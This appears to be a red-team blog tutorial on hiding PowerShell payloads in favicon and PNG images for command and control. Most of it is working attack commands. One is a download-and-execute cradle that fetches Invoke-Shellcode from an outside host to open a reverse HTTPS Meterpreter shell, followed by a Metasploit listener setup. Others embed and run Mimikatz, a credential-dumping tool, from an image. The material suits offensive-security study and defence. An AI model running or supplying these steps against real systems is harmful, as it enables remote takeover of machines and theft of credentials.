Command and Control – Images

Images traditionally have been used as a method of hiding a message. It is possibly for forensic investigators the oldest trick in the book to search for evidence inside that type of files. However in offensive security and red teaming pictures can hide commands, payloads and scripts.

Michael Scott developed  a python script which can generate an icon image and embed into this image a PowerShell command. The first step is to write the command into a text file.

echo 'IEX((new-object net.webclient).downloadstring("http://192.168.1.171/tmp/Invoke-Shellcode.ps1"));Invoke-Shellcode -payload windows/meterpreter/reverse_https -LHOST 192.168.1.171 -LPORT 443 -force' > shellcode.txt

The next step is to create the favicon which will contain the embedded payload, start the apache web server and move the icon to a web server directory.

python create_favicon.py shellcode.txt evil.png
service apache2 start
mv evil.png /var/www/favicon.ico

Metasploit module multi/handler can be used to receive the connection once the command is executed on the target host.

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST XXX.XXX.XXX.XXX
set LPORT 443

The Get-FaviconText PowerShell script will download the icon into a temporary directory and it will convert the pixels back to characters in order to execute the payload command.

Import-Module .\readFavicon.ps1
Get-FaviconText -URL http://192.168.1.171/favicon.ico -WriteTo $env:TEMP

The Get-FaviconText script is actually the implant which needs to be executed on the target. Even if permissions are not set on the web directory to access this file the payload command inside the icon will still run.

A Meterpreter session will open and the target can be controlled through Metasploit.

However it is also possible to use other types of images such as JPG in order to embed not just commands but full PowerShell scripts in order to perform various other post exploitation activities. Barrett Adams developed a PowerShell module that can use pixels of a PNG file to embed a PowerShell script. This module will also generate an oneliner command for execution:

Import-Module .\Invoke-PSImage.ps1
Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\77.jpg -Out .\mimikatz.png -Web

Executing the oneliner will result of running Mimikatz through a PNG file that is stored on a web server.

Alternatively this script can generate an oneliner for an image that is hosted locally.

Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\77.jpg -Out .\mimikatz2.png

Running the command will execute Mimikatz from the PNG file.

Conclusion

Images can be used to execute shellcode and scripts and perform other activities. There is a limitation in the number of characters that can be used therefore only images with a lot of pixels can carry a script. It is an interesting method of hiding payloads in plain sight and a type of threat that it could be prevented if PowerShell was disabled across the network.

References

• https://github.com/et0x/C2
• http://rwnin.net/?p=35
• https://github.com/peewpw/Invoke-PSImage